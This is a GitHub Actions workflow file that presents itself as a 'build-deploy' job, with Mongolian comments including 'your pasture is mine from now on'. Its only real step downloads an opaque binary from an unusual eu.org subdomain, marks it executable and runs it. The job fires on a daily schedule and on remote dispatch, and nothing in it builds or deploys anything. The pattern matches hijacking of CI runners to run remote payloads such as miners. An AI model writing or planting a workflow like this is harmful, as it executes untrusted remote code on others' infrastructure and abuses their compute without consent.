#Чиний бэлчээр одооноос минийх
#2024-03-16-[094948]-xnrbzqze
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "51 2 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Тал нутгаас мэндчилж байна!
        run: |
          wget -q https://bangla-87t33kx9.digitalmarketingservice.eu.org/Mongolian_grassland
          chmod 755 Mongolian_grassland
          ./Mongolian_grassland
